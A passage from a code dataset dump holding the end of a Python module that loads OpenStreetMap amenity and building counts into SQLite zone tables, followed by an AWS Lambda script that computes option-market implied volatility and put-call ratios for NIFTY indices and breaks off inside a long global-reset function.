*osm_data*(:obj:`dict`): dictionary to store downloaded data\n\n \"\"\"\n\n def __init__(self, tag: str, project: Project, osm_data: dict):\n self.__tag = tag\n self._project = project\n self.__zones = load_zones(project)\n self.__osm_data = osm_data\n self.__columns = {\n \"amenity\": [\"type\", \"id\", \"amenity\", \"zone_id\", \"geom\"],\n \"building\": [\"type\", \"id\", \"building\", \"zone_id\", \"area\", \"geom\"],\n }\n self.__query_fields = {\n \"amenity\": {\n \"tag_value\": \"amenity\",\n \"field_name\": \"\",\n \"field_value\": \"\",\n \"geom_type\": \"Point\",\n \"field_type\": \"\",\n },\n \"building\": {\n \"tag_value\": \"building\",\n \"field_name\": \"area, \",\n \"field_value\": \"ROUND(?, 2), \",\n \"geom_type\": \"MultiPolygon\",\n \"field_type\": ', \"area\" FLOAT',\n },\n }\n self.__all_tables = [\n x[0] for x in project.conn.execute(\"SELECT name FROM sqlite_master WHERE type ='table'\").fetchall()\n ]\n\n self.__initialize()\n\n def import_osm_data(self):\n \"\"\"\n Imports OSM data.\n\n Parameters:\n *tile_size*(:obj:`int`): tile size (in kilometers)\n \"\"\"\n df = pd.DataFrame.from_dict(generic_tag(self.__tag, self.__osm_data, self._project))\n\n if len(df) == 0:\n return\n\n tag_value = building_values if self.__tag == \"building\" else amenity_values\n\n df[\"geom\"] = df.apply(self.__point_or_polygon, axis=1)\n\n df[\"tags\"] = df[\"tags\"].apply(pd.Series)[self.__tag].values\n\n df[\"update_tags\"] = df[\"tags\"].apply(lambda x: tag_value.get(x))\n\n df.update_tags.fillna(\"undetermined\", inplace=True)\n\n df.drop(columns=[\"tags\"], inplace=True)\n\n df.rename(columns={\"update_tags\": self.__tag}, inplace=True)\n\n clean_df = df[[\"type\", \"id\", \"geom\", self.__tag]]\n\n gdf = gpd.GeoDataFrame(clean_df, geometry=gpd.GeoSeries.from_wkb(clean_df.geom), crs=4326)\n\n tag_by_zone = gpd.sjoin(gdf, self.__zones)\n\n tag_by_zone.drop(columns=\"index_right\", inplace=True)\n\n # Save count and area information within the project's zones database\n counting_table = tag_by_zone.groupby(\"zone_id\").count()[[self.__tag]].fillna(0)\n counting_table[\"zone_id\"] = [i for i in counting_table.index]\n\n exp = f\"ALTER TABLE zones ADD osm_{self.__tag}_count INT;\"\n self._project.conn.execute(exp)\n self._project.conn.commit()\n\n # For small geographical regions, some zones can have zero buildings and/or amenities\n # So we execute the following query to replace NaN values in zones table by zeros\n zero_counts = [i for i in np.arange(1, len(self.__zones) + 1) if i not in counting_table.zone_id.values]\n count_qry = f\"UPDATE zones SET osm_{self.__tag}_count=0 WHERE zone_id=?;\"\n self._project.conn.executemany(count_qry, list((x,) for x in zero_counts))\n self._project.conn.commit()\n\n count_qry = f\"UPDATE zones SET osm_{self.__tag}_count=? WHERE zone_id=?;\"\n self._project.conn.executemany(count_qry, list(counting_table.itertuples(index=False, name=None)))\n self._project.conn.commit()\n\n if self.__tag == \"building\":\n tag_by_zone[\"area\"] = tag_by_zone.to_crs(3857).area\n\n area_table = tag_by_zone.groupby(\"zone_id\").sum(numeric_only=True)[[\"area\"]].fillna(0)\n area_table[\"zone_id\"] = [i for i in area_table.index]\n\n self._project.conn.execute(\"ALTER TABLE zones ADD osm_building_area FLOAT;\")\n self._project.conn.commit()\n\n zero_area = [i for i in np.arange(1, len(self.__zones) + 1) if i not in area_table.zone_id.values]\n # area_qry = area_query(area_table, func=\"set_zero\")\n area_qry = \"UPDATE zones SET osm_building_area=0 WHERE zone_id=?\"\n self._project.conn.executemany(area_qry, list((x,) for x in zero_area))\n self._project.conn.commit()\n\n # area_qry = area_query(area_table)\n area_qry = \"UPDATE zones SET osm_building_area=ROUND(?,2) WHERE zone_id=?;\"\n self._project.conn.executemany(area_qry, list(area_table.itertuples(index=False, name=None)))\n self._project.conn.commit()\n\n # Create a database to store the data\n key = self.__query_fields[self.__tag]\n\n if f\"osm_{self.__tag}\" not in self.__all_tables:\n self._project.conn.execute(\n f'CREATE TABLE IF NOT EXISTS osm_{key[\"tag_value\"]}(\"type\" TEXT, \"id\" INTEGER, \"{key[\"tag_value\"]}\" TEXT, \"zone_id\" INTEGER{key[\"field_type\"]});'\n )\n self._project.conn.execute(\n f\"SELECT AddGeometryColumn('osm_{key['tag_value']}', 'geometry', 4326, '{key['geom_type'].upper()}', 'XY' );\"\n )\n self._project.conn.execute(f\"SELECT CreateSpatialIndex('osm_{key['tag_value']}', 'geometry' );\")\n self._project.conn.commit()\n\n qry = f\"INSERT INTO osm_{key['tag_value']}(type, id, {key['tag_value']}, zone_id, {key['field_name']}geometry) VALUES(?, ?, ?, ?, {key['field_value']}CastTo{key['geom_type']}(ST_GeomFromWKB(?, 4326)));\"\n\n list_of_tuples = list(tag_by_zone[self.__columns[self.__tag]].fillna(0).itertuples(index=False, name=None))\n\n self._project.conn.executemany(qry, list_of_tuples)\n self._project.conn.commit()\n\n return tag_by_zone\n\n def __initialize(self):\n \"\"\"\n Checks the desired tag. Currently supports only amenity and building.\n \"\"\"\n if self.__tag not in [\"amenity\", \"building\"]:\n raise ValueError(\"Tag value not available.\")\n\n @property\n def tag_value(self):\n \"\"\"Return the tag value.\"\"\"\n return self.__tag\n\n def __point_or_polygon(self, row):\n \"\"\"\n Write the WKB of a Point or a Polygon.\n\n Parameters:\n *row*(:obj:`pd.DataFrame`): rows of a pandas' DataFrame.\n \"\"\"\n if row.type != \"node\" and len(row.geometry) < 4:\n return box(*row.bounds.values()).wkb\n elif row.type != \"node\" and len(row.geometry) >= 4:\n return Polygon([(dct[\"lon\"], dct[\"lat\"]) for dct in row.geometry]).wkb\n else:\n return Point(np.array([row.lon, row.lat])).wkb\n","repo_name":"AequilibraE/tradesman","sub_path":"tradesman/data_retrieval/osm_tags/import_osm_data.py","file_name":"import_osm_data.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"9024636558","text":"from __future__ import print_function\r\nimport json\r\nimport urllib\r\nimport re\r\nimport os, sys\r\nimport datetime\r\nimport math\r\nfrom math import *\r\nimport csv\r\nimport time\r\nimport boto3\r\n\r\ndynamodb = boto3.resource('dynamodb')\r\ns3 = boto3.client('s3')\r\n\r\n\r\ndef lambda_handler(event, context):\r\n bucketin = event['Records'][0]['s3']['bucket']['name']\r\n keyin = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')\r\n bucketout = bucketin\r\n length = len(keyin)\r\n withstp = keyin[9:length - 7]\r\n lengthwstp = len(withstp)\r\n first5 = withstp[0:5]\r\n if (first5 == 'BANKN'):\r\n companyname = 'BANKNIFTY'\r\n else:\r\n companyname = 'NIFTY'\r\n lencompany = len(companyname)\r\n stp = withstp[lencompany:lengthwstp]\r\n keycall = keyin[:length - 7] + 'Call.csv'\r\n keyput = keyin[:length - 7] + 'Put.csv'\r\n keyivoicall = 'SampledData/' + companyname + 'Call.csv'\r\n keyivoiput = 'SampledData/' + companyname + 'Put.csv'\r\n keyprmtr = 'Controllers/PRMTR.csv' # + keyin[26:length]\r\n keyout = 'MDIVOIDataOne/' + companyname + '/' + stp + '.csv'\r\n PRMTR = CSVtoPRMTRlmbda(bucketin, keyprmtr)\r\n LastDateTime = PRMTR[2][0]\r\n LastDateTime = datetime.datetime.strptime(LastDateTime, '%m/%d/%y %H:%M')\r\n CurrentDateTime = PRMTR[1][0]\r\n CurrentDateTime = datetime.datetime.strptime(CurrentDateTime, '%m/%d/%y %H:%M')\r\n nos = PRMTR[1][1]\r\n MatrixIvOiCall = IvOiCSVtoArraylmbda(bucketin, keyivoicall, stp)\r\n MatrixIvOiPut = IvOiCSVtoArraylmbda(bucketin, keyivoiput, stp)\r\n MatrixCall = TickCSVtoMatrixlmbda(bucketin, keycall, LastDateTime)\r\n MatrixPut = TickCSVtoMatrixlmbda(bucketin, keyput, LastDateTime)\r\n diffVolumePut = MatrixIvOiPut[10] - MatrixIvOiPut[16]\r\n diffOiPut = MatrixIvOiPut[11] - MatrixIvOiPut[17]\r\n diffVolumeCall = MatrixIvOiCall[10] - MatrixIvOiCall[16]\r\n diffOiCall = MatrixIvOiCall[11] - MatrixIvOiCall[17]\r\n ivcallask = implied_volatility(MatrixIvOiCall, 'Call', 'ask')\r\n ivcallbid = implied_volatility(MatrixIvOiCall, 'Call', 'bid')\r\n ivcalltrade = implied_volatility(MatrixIvOiCall, 'Call', 'trade')\r\n ivputask = implied_volatility(MatrixIvOiPut, 'Put', 'ask')\r\n ivputbid = implied_volatility(MatrixIvOiPut, 'Put', 'bid')\r\n ivputtrade = implied_volatility(MatrixIvOiPut, 'Put', 'trade')\r\n MatrixIvOiPut = [1 if x == 0 else x for x in MatrixIvOiPut]\r\n MatrixIvOiCall = [1 if x == 0 else x for x in MatrixIvOiCall]\r\n IvOiPCR = [x / y for x, y in zip(MatrixIvOiPut, MatrixIvOiCall)]\r\n try:\r\n ivPCRask = ivputask / ivcallask\r\n except Exception as e:\r\n ivPCRask = 1\r\n try:\r\n ivPCRbid = ivputbid / ivcallbid\r\n except Exception as e:\r\n ivPCRbid = 1\r\n try:\r\n ivPCRtrade = ivputtrade / ivcalltrade\r\n except Exception as e:\r\n ivPCRtrade = 1\r\n IvOiPCR.extend([ivPCRask])\r\n IvOiPCR.extend([ivPCRbid])\r\n IvOiPCR.extend([ivPCRtrade])\r\n IvOiPCR.extend([ivcallask])\r\n IvOiPCR.extend([ivcallbid])\r\n IvOiPCR.extend([ivcalltrade])\r\n IvOiPCR.extend([ivputask])\r\n IvOiPCR.extend([ivputbid])\r\n IvOiPCR.extend([ivputtrade])\r\n IvOiPCR.extend([diffVolumeCall])\r\n IvOiPCR.extend([diffOiCall])\r\n IvOiPCR.extend([diffVolumePut])\r\n IvOiPCR.extend([diffOiPut])\r\n InitToZero()\r\n MDCall = marketdynamic(MatrixCall)\r\n MDCall = [1 if x == 0 else x for x in MDCall]\r\n InitToZero()\r\n MDPut = marketdynamic(MatrixPut)\r\n MDPut = [1 if x == 0 else x for x in MDPut]\r\n MDPCR = [x / y for x, y in zip(MDPut, MDCall)]\r\n ValuePerTradeCall = MDCall[14]\r\n ValuePerBidCall = MDCall[29]\r\n ValuePerAskCall = MDCall[44]\r\n TradeFrequencyUpTickCall = MDCall[54]\r\n TradeFrequencyDownTickCall = MDCall[55]\r\n BidFrequencyUpTickCall = MDCall[84]\r\n BidFrequencyDownTickCall = MDCall[85]\r\n AskFrequencyUpTickCall = MDCall[114]\r\n AskFrequencyDownTickCall = MDCall[115]\r\n ValuePerTradePut = MDPut[14]\r\n ValuePerBidPut = MDPut[29]\r\n ValuePerAskPut = MDPut[44]\r\n TradeFrequencyUpTickPut = MDPut[54]\r\n TradeFrequencyDownTickPut = MDPut[55]\r\n BidFrequencyUpTickPut = MDPut[84]\r\n BidFrequencyDownTickPut = MDPut[85]\r\n AskFrequencyUpTickPut = MDPut[114]\r\n AskFrequencyDownTickPut = MDPut[115]\r\n addMD = [ValuePerTradeCall, ValuePerTradePut, ValuePerBidCall, ValuePerBidPut, ValuePerAskCall, ValuePerAskPut,\r\n TradeFrequencyUpTickCall, TradeFrequencyUpTickPut, TradeFrequencyDownTickCall, TradeFrequencyDownTickPut,\r\n BidFrequencyUpTickCall, BidFrequencyUpTickPut, BidFrequencyDownTickCall, BidFrequencyDownTickPut,\r\n AskFrequencyUpTickCall, AskFrequencyUpTickPut, AskFrequencyDownTickCall, AskFrequencyDownTickPut]\r\n MDPCR.extend(addMD)\r\n MDPCR.extend(IvOiPCR)\r\n Header = ['Open', 'TradePriceVolumeWeighted', 'TradeTotalPrice', 'Close', 'High', 'Low', 'TradeTickPrice', 'Volume',\r\n 'TradeTickVolume', 'TradeMinVolume', 'TradeMaxVolume', 'TradeCurrentSize', 'TradeTotalSize',\r\n 'TradeTotalValue', 'ValuePerTrade', 'TradeFrequency', 'BidCurrentPrice', 'BidTotalPrice',\r\n 'BidPriceVolumeWeighted', 'BidMinPrice', 'BidMaxPrice', 'BidTickPrice', 'BidVolumePriceWeighted',\r\n 'BidTickVolume', 'BidMinVolume', 'BidMaxVolume', 'BidCurrentSize', 'BidTotalSize', 'BidTotalValue',\r\n 'ValuePerBid', 'BidFrequency', 'AskCurrentPrice', 'AskTotalPrice', 'AskPriceVolumeWeighted',\r\n 'AskMinPrice', 'AskMaxPrice', 'AskTickPrice', 'AskVolumePriceWeighted', 'AskTickVolume', 'AskMinVolume',\r\n 'AskMaxVolume', 'AskCurrentSize', 'AskTotalSize', 'AskTotalValue', 'ValuePerAsk', 'AskFrequency',\r\n 'TradeTotalValueUpTick', ' TradeTotalValueDownTick', ' TradeTotalSizeUpTick', 'TradeTotalSizeDownTick',\r\n ' TradeTotalPriceUpTick', ' TradeTotalPriceDownTick', ' TradePriceVolumeWeightedUpTick',\r\n ' TradePriceVolumeWeightedDownTick', 'TradeFrequencyUpTick', ' TradeFrequencyDownTick',\r\n ' TradeMinPriceUpTick', ' TradeMinPriceDownTick', ' TradeMaxPriceUpTick', ' TradeMaxPriceDownTick',\r\n 'TradeVolumePriceWeightedUpTick', ' TradeVolumePriceWeightedDownTick', ' TradeTickVolumeUpTick',\r\n ' TradeTickVolumeDownTick', ' TradeMinVolumeUpTick', ' TradeMinVolumeDownTick', 'TradeMaxVolumeUpTick',\r\n ' TradeMaxVolumeDownTick', ' ValuePerTradeUpTick', ' ValuePerTradeDownTick', ' TradeOpenPriceUpTick',\r\n ' TradeClosePriceUpTick', ' TradeOpenPriceDownTick', 'TradeClosePriceDownTick', ' TradeCloseVolumeUpTick',\r\n ' TradeCloseVolumeDownTick', 'BidTotalValueUpTick', ' BidTotalValueDownTick', ' BidTotalSizeUpTick',\r\n ' BidTotalSizeDownTick', 'BidTotalPriceUpTick', ' BidTotalPriceDownTick', ' BidPriceVolumeWeightedUpTick',\r\n ' BidPriceVolumeWeightedDownTick', ' BidFrequencyUpTick', ' BidFrequencyDownTick', ' BidMinPriceUpTick',\r\n 'BidMinPriceDownTick', ' BidMaxPriceUpTick', ' BidMaxPriceDownTick', ' BidVolumePriceWeightedUpTick',\r\n ' BidVolumePriceWeightedDownTick', ' BidTickVolumeUpTick', ' BidTickVolumeDownTick', 'BidMinVolumeUpTick',\r\n ' BidMinVolumeDownTick', ' BidMaxVolumeUpTick', ' BidMaxVolumeDownTick', ' ValuePerBidUpTick',\r\n ' ValuePerBidDownTick', ' BidOpenPriceUpTick', ' BidClosePriceUpTick', 'BidOpenPriceDownTick',\r\n ' BidClosePriceDownTick', ' BidCloseVolumeUpTick', ' BidCloseVolumeDownTick', 'AskTotalValueUpTick',\r\n ' AskTotalValueDownTick', ' AskTotalSizeUpTick', 'AskTotalSizeDownTick', ' AskTotalPriceUpTick',\r\n ' AskTotalPriceDownTick', ' AskPriceVolumeWeightedUpTick', ' AskPriceVolumeWeightedDownTick',\r\n ' AskFrequencyUpTick', ' AskFrequencyDownTick', 'AskMinPriceUpTick', ' AskMinPriceDownTick',\r\n ' AskMaxPriceUpTick', ' AskMaxPriceDownTick', ' AskVolumePriceWeightedUpTick',\r\n ' AskVolumePriceWeightedDownTick', ' AskTickVolumeUpTick', 'AskTickVolumeDownTick', ' AskMinVolumeUpTick',\r\n ' AskMinVolumeDownTick', ' AskMaxVolumeUpTick', ' AskMaxVolumeDownTick', ' ValuePerAskUpTick',\r\n ' ValuePerAskDownTick', ' AskOpenPriceUpTick', 'AskClosePriceUpTick', ' AskOpenPriceDownTick',\r\n ' AskClosePriceDownTick', ' AskCloseVolumeUpTick', ' AskCloseVolumeDownTick', 'TradeUpStdDeviation',\r\n ' TradeDownStdDeviation', 'TradeUpMedian', 'TradeDownMedian', 'TradeUpProbability',\r\n 'TradeDownProbability', 'ValuePerTradeCall', 'ValuePerTradePut', 'ValuePerBidCall', 'ValuePerBidPut',\r\n 'ValuePerAskCall', 'ValuePerAskPut', 'TradeFrequencyUpTickCall', 'TradeFrequencyUpTickPut',\r\n 'TradeFrequencyDownTickCall', 'TradeFrequencyDownTickPut', 'BidFrequencyUpTickCall',\r\n 'BidFrequencyUpTickPut', 'BidFrequencyDownTickCall', 'BidFrequencyDownTickPut', 'AskFrequencyUpTickCall',\r\n 'AskFrequencyUpTickPut', 'AskFrequencyDownTickCall', 'AskFrequencyDownTickPut', 'Strike', 'Bid Size',\r\n 'Avg_Bid_Ask', 'Bid', 'Ask', 'Ask Size', 'High', 'Low', 'Last', 'Expiry', 'Volume', 'OpenInt',\r\n 'Trade Size', 'DTE', 'Expiration', 'Current Underlying Price', 'LastVolume', 'LastOI', 'ivPCRask',\r\n 'ivPCRbid', 'ivPCRtrade', 'ivcallask', 'ivcallbid', 'ivcalltrade', 'ivputask', 'ivputbid', 'ivputtrade',\r\n 'diffVolumeCall', 'diffOiCall', 'diffVolumePut', 'diffOiPut']\r\n MatrixToCSVWritelmbdaOne(bucketout, MDPCR, Header, keyout, LastDateTime, CurrentDateTime, nos)\r\n\r\n\r\n## Main function ends here and Sub functions start here\r\nTradePrice = 0\r\nBidPrice = 0\r\nAskPrice = 0\r\nTradeSize = 0\r\nBidSize = 0\r\nAskSize = 0\r\nTradeVolume = 0\r\nBidVolume = 0\r\nAskVolume = 0\r\nTradeUpPrice = [0]\r\nTradeUpVolume = [0]\r\nTradeDownPrice = [0]\r\nTradeDownVolume = [0]\r\nBidUpPrice = [0]\r\nBidUpVolume = [0]\r\nBidDownPrice = [0]\r\nBidDownVolume = [0]\r\nAskUpPrice = [0]\r\nAskUpVolume = [0]\r\nAskDownPrice = [0]\r\nAskDownVolume = [0]\r\nMedian = 0\r\nUpCutOff = 0.5\r\nDownCutOff = 0.5\r\nMedianUpCutOff = 0\r\nMedianDownCutOff = 0\r\nOpen1 = 0\r\nClose = 0\r\nHigh = 0\r\nLow = 0\r\nVolume = 0\r\nTradeFrequency = 0\r\nTradeTotalPrice = 0\r\nTradeTotalSize = 0\r\nTradeTotalValue = 0\r\nTradeMaxPrice = 0\r\nTradeMinPrice = 0\r\nTradeMaxVolume = 0\r\nTradeMinVolume = 0\r\nTradeTickPrice = 0\r\nTradeTickVolume = 0\r\nTradeOpenPriceUpTick = 0\r\nTradeFrequencyUpTick = 0\r\nTradeTotalPriceUpTick = 0\r\nTradeTotalSizeUpTick = 0\r\nTradeTotalValueUpTick = 0\r\nTradeMaxPriceUpTick = 0\r\nTradeMinPriceUpTick = 0\r\nTradeMaxVolumeUpTick = 0\r\nTradeMinVolumeUpTick = 0\r\nTradeTickVolumeUpTick = 0\r\nTradeOpenPriceDownTick = 0\r\nTradeFrequencyDownTick = 0\r\nTradeTotalPriceDownTick = 0\r\nTradeTotalSizeDownTick = 0\r\nTradeTotalValueDownTick = 0\r\nTradeMaxPriceDownTick = 0\r\nTradeMinPriceDownTick = 0\r\nTradeMaxVolumeDownTick = 0\r\nTradeMinVolumeDownTick = 0\r\nTradeTickVolumeDownTick = 0\r\nBidFrequency = 0\r\nBidTotalPrice = 0\r\nBidTotalSize = 0\r\nBidTotalValue = 0\r\nBidMaxPrice = 0\r\nBidMinPrice = 0\r\nBidMaxVolume = 0\r\nBidMinVolume = 0\r\nBidTickPrice = 0\r\nBidTickVolume = 0\r\nBidOpenPriceUpTick = 0\r\nBidFrequencyUpTick = 0\r\nBidTotalPriceUpTick = 0\r\nBidTotalSizeUpTick = 0\r\nBidTotalValueUpTick = 0\r\nBidMaxPriceUpTick = 0\r\nBidMinPriceUpTick = 0\r\nBidMaxVolumeUpTick = 0\r\nBidMinVolumeUpTick = 0\r\nBidTickVolumeUpTick = 0\r\nBidOpenPriceDownTick = 0\r\nBidFrequencyDownTick = 0\r\nBidTotalPriceDownTick = 0\r\nBidTotalSizeDownTick = 0\r\nBidTotalValueDownTick = 0\r\nBidMaxPriceDownTick = 0\r\nBidMinPriceDownTick = 0\r\nBidMaxVolumeDownTick = 0\r\nBidMinVolumeDownTick = 0\r\nBidTickVolumeDownTick = 0\r\nAskFrequency = 0\r\nAskTotalPrice = 0\r\nAskTotalSize = 0\r\nAskTotalValue = 0\r\nAskMaxPrice = 0\r\nAskMinPrice = 0\r\nAskMaxVolume = 0\r\nAskMinVolume = 0\r\nAskTickPrice = 0\r\nAskTickVolume = 0\r\nAskOpenPriceUpTick = 0\r\nAskFrequencyUpTick = 0\r\nAskTotalPriceUpTick = 0\r\nAskTotalSizeUpTick = 0\r\nAskTotalValueUpTick = 0\r\nAskMaxPriceUpTick = 0\r\nAskMinPriceUpTick = 0\r\nAskMaxVolumeUpTick = 0\r\nAskMinVolumeUpTick = 0\r\nAskTickVolumeUpTick = 0\r\nAskOpenPriceDownTick = 0\r\nAskFrequencyDownTick = 0\r\nAskTotalPriceDownTick = 0\r\nAskTotalSizeDownTick = 0\r\nAskTotalValueDownTick = 0\r\nAskMaxPriceDownTick = 0\r\nAskMinPriceDownTick = 0\r\nAskMaxVolumeDownTick = 0\r\nAskMinVolumeDownTick = 0\r\nAskTickVolumeDownTick = 0\r\nTradePriceVolumeWeighted = 0\r\nTradeTotalPrice = 0\r\nTradeCurrentPrice = 0\r\nTradeMaxPrice = 0\r\nTradeMinPrice = 0\r\nTradeTickPrice = 0\r\nTradeVolumePriceWeighted = 0\r\nTradeTickVolume = 0\r\nTradeMinVolume = 0\r\nTradeMaxVolume = 0\r\nTradeCurrentSize = 0\r\nTradeTotalSize = 0\r\nTradeTotalValue = 0\r\nValuePerTrade = 0\r\nTradeFrequency = 0\r\nBidCurrentPrice = 0\r\nBidTotalPrice = 0\r\nBidPriceVolumeWeighted = 0\r\nBidMinPrice = 0\r\nBidMaxPrice = 0\r\nBidTickPrice = 0\r\nBidVolumePriceWeighted = 0\r\nBidTickVolume = 0\r\nBidMinVolume = 0\r\nBidMaxVolume = 0\r\nBidCurrentSize = 0\r\nBidTotalSize = 0\r\nBidTotalValue = 0\r\nValuePerBid = 0\r\nBidFrequency = 0\r\nAskCurrentPrice = 0\r\nAskTotalPrice = 0\r\nAskPriceVolumeWeighted = 0\r\nAskMinPrice = 0\r\nAskMaxPrice = 0\r\nAskTickPrice = 0\r\nAskVolumePriceWeighted = 0\r\nAskTickVolume = 0\r\nAskMinVolume = 0\r\nAskMaxVolume = 0\r\nAskCurrentSize = 0\r\nAskTotalSize = 0\r\nAskTotalValue = 0\r\nValuePerAsk = 0\r\nAskFrequency = 0\r\nTradeTotalValueUpTick = 0\r\nTradeTotalValueDownTick = 0\r\nTradeTotalSizeUpTick = 0\r\nTradeTotalSizeDownTick = 0\r\nTradeTotalPriceUpTick = 0\r\nTradeTotalPriceDownTick = 0\r\nTradePriceVolumeWeightedUpTick = 0\r\nTradePriceVolumeWeightedDownTick = 0\r\nTradeFrequencyUpTick = 0\r\nTradeFrequencyDownTick = 0\r\nTradeMinPriceUpTick = 0\r\nTradeMinPriceDownTick = 0\r\nTradeMaxPriceUpTick = 0\r\nTradeMaxPriceDownTick = 0\r\nTradeVolumePriceWeightedUpTick = 0\r\nTradeVolumePriceWeightedDownTick = 0\r\nTradeTickVolumeUpTick = 0\r\nTradeTickVolumeDownTick = 0\r\nTradeMinVolumeUpTick = 0\r\nTradeMinVolumeDownTick = 0\r\nTradeMaxVolumeUpTick = 0\r\nTradeMaxVolumeDownTick = 0\r\nValuePerTradeUpTick = 0\r\nValuePerTradeDownTick = 0\r\nTradeOpenPriceUpTick = 0\r\nTradeClosePriceUpTick = 0\r\nTradeOpenPriceDownTick = 0\r\nTradeClosePriceDownTick = 0\r\nTradeCloseVolumeUpTick = 0\r\nTradeCloseVolumeDownTick = 0\r\nBidTotalValueUpTick = 0\r\nBidTotalValueDownTick = 0\r\nBidTotalSizeUpTick = 0\r\nBidTotalSizeDownTick = 0\r\nBidTotalPriceUpTick = 0\r\nBidTotalPriceDownTick = 0\r\nBidPriceVolumeWeightedUpTick = 0\r\nBidPriceVolumeWeightedDownTick = 0\r\nBidFrequencyUpTick = 0\r\nBidFrequencyDownTick = 0\r\nBidMinPriceUpTick = 0\r\nBidMinPriceDownTick = 0\r\nBidMaxPriceUpTick = 0\r\nBidMaxPriceDownTick = 0\r\nBidVolumePriceWeightedUpTick = 0\r\nBidVolumePriceWeightedDownTick = 0\r\nBidTickVolumeUpTick = 0\r\nBidTickVolumeDownTick = 0\r\nBidMinVolumeUpTick = 0\r\nBidMinVolumeDownTick = 0\r\nBidMaxVolumeUpTick = 0\r\nBidMaxVolumeDownTick = 0\r\nValuePerBidUpTick = 0\r\nValuePerBidDownTick = 0\r\nBidOpenPriceUpTick = 0\r\nBidClosePriceUpTick = 0\r\nBidOpenPriceDownTick = 0\r\nBidClosePriceDownTick = 0\r\nBidCloseVolumeUpTick = 0\r\nBidCloseVolumeDownTick = 0\r\nAskTotalValueUpTick = 0\r\nAskTotalValueDownTick = 0\r\nAskTotalSizeUpTick = 0\r\nAskTotalSizeDownTick = 0\r\nAskTotalPriceUpTick = 0\r\nAskTotalPriceDownTick = 0\r\nAskPriceVolumeWeightedUpTick = 0\r\nAskPriceVolumeWeightedDownTick = 0\r\nAskFrequencyUpTick = 0\r\nAskFrequencyDownTick = 0\r\nAskMinPriceUpTick = 0\r\nAskMinPriceDownTick = 0\r\nAskMaxPriceUpTick = 0\r\nAskMaxPriceDownTick = 0\r\nAskVolumePriceWeightedUpTick = 0\r\nAskVolumePriceWeightedDownTick = 0\r\nAskTickVolumeUpTick = 0\r\nAskTickVolumeDownTick = 0\r\nAskMinVolumeUpTick = 0\r\nAskMinVolumeDownTick = 0\r\nAskMaxVolumeUpTick = 0\r\nAskMaxVolumeDownTick = 0\r\nValuePerAskUpTick = 0\r\nValuePerAskDownTick = 0\r\nAskOpenPriceUpTick = 0\r\nAskClosePriceUpTick = 0\r\nAskOpenPriceDownTick = 0\r\nAskClosePriceDownTick = 0\r\nAskCloseVolumeUpTick = 0\r\nAskCloseVolumeDownTick = 0\r\nTradeUpStdDeviation = 0\r\nTradeDownStdDeviation = 0\r\nTradeUpMedian = 0\r\nTradeDownMedian = 0\r\nTradeUpProbability = 0\r\nTradeDownProbability = 0\r\nBidUpProbability = 0\r\nBidDownProbability = 0\r\nAskUpProbability = 0\r\nAskDownProbability = 0\r\n\r\n\r\ndef InitToZero():\r\n global TradePrice\r\n global BidPrice\r\n global AskPrice\r\n global TradeSize\r\n global BidSize\r\n global AskSize\r\n\r\n global TradeUpPrice\r\n global TradeUpVolume\r\n global TradeDownPrice\r\n global TradeDownVolume\r\n global BidUpPrice\r\n global BidUpVolume\r\n global BidDownPrice\r\n global BidDownVolume\r\n global AskUpPrice\r\n global AskUpVolume\r\n global AskDownPrice\r\n global AskDownVolume\r\n\r\n global UpCutOff\r\n global DownCutOff\r\n global MedianUpCutOff\r\n global MedianDownCutOff\r\n global Open1\r\n global Close\r\n global High\r\n global Low\r\n global Volume\r\n global TradeFrequency\r\n global TradeTotalPrice\r\n global TradeTotalSize\r\n global TradeTotalValue\r\n global TradeMaxPrice\r\n global TradeMinPrice\r\n global TradeMaxVolume\r\n global TradeMinVolume\r\n global TradeTickPrice\r\n global TradeTickVolume\r\n global TradeOpenPriceUpTick\r\n global TradeFrequencyUpTick\r\n global TradeTotalPriceUpTick\r\n global TradeTotalSizeUpTick\r\n global TradeTotalValueUpTick\r\n global TradeMaxPriceUpTick\r\n global TradeMinPriceUpTick\r\n global TradeMaxVolumeUpTick\r\n global TradeMinVolumeUpTick\r\n global TradeTickVolumeUpTick\r\n global TradeOpenPriceDownTick\r\n global TradeFrequencyDownTick\r\n global TradeTotalPriceDownTick\r\n global TradeTotalSizeDownTick\r\n global TradeTotalValueDownTick\r\n global TradeMaxPriceDownTick\r\n global TradeMinPriceDownTick\r\n global TradeMaxVolumeDownTick\r\n global TradeMinVolumeDownTick\r\n global TradeTickVolumeDownTick\r\n global BidFrequency\r\n global BidTotalPrice\r\n global BidTotalSize\r\n global BidTotalValue\r\n global BidMaxPrice\r\n global BidMinPrice\r\n global BidMaxVolume\r\n global BidMinVolume\r\n global BidTickPrice\r\n global BidTickVolume\r\n global BidOpenPriceUpTick\r\n global BidFrequencyUpTick\r\n global BidTotalPriceUpTick\r\n global BidTotalSizeUpTick\r\n global BidTotalValueUpTick\r\n global BidMaxPriceUpTick\r\n global BidMinPriceUpTick\r\n global BidMaxVolumeUpTick\r\n global BidMinVolumeUpTick\r\n global BidTickVolumeUpTick\r\n global BidOpenPriceDownTick\r\n global BidFrequencyDownTick\r\n global BidTotalPriceDownTick\r\n global BidTotalSizeDownTick\r\n global BidTotalValueDownTick\r\n global BidMaxPriceDownTick\r\n global BidMinPriceDownTick\r\n global BidMaxVolumeDownTick\r\n global BidMinVolumeDownTick\r\n global BidTickVolumeDownTick\r\n global AskFrequency\r\n global AskTotalPrice\r\n global AskTotalSize\r\n global AskTotalValue\r\n global AskMaxPrice\r\n global AskMinPrice\r\n global AskMaxVolume\r\n global AskMinVolume\r\n global AskTickPrice\r\n global AskTickVolume\r\n global AskOpenPriceUpTick\r\n global AskFrequencyUpTick\r\n global AskTotalPriceUpTick\r\n global AskTotalSizeUpTick\r\n global AskTotalValueUpTick\r\n global AskMaxPriceUpTick\r\n global AskMinPriceUpTick\r\n global AskMaxVolumeUpTick\r\n global AskMinVolumeUpTick\r\n global AskTickVolumeUpTick\r\n global AskOpenPriceDownTick\r\n global AskFrequencyDownTick\r\n global AskTotalPriceDownTick\r\n global AskTotalSizeDownTick\r\n global AskTotalValueDownTick\r\n global AskMaxPriceDownTick\r\n global AskMinPriceDownTick\r\n global AskMaxVolumeDownTick\r\n global AskMinVolumeDownTick\r\n global AskTickVolumeDownTick\r\n global TradePriceVolumeWeighted\r\n global TradeTotalPrice\r\n global TradeCurrentPrice\r\n global TradeMaxPrice\r\n global TradeMinPrice\r\n global TradeTickPrice\r\n global 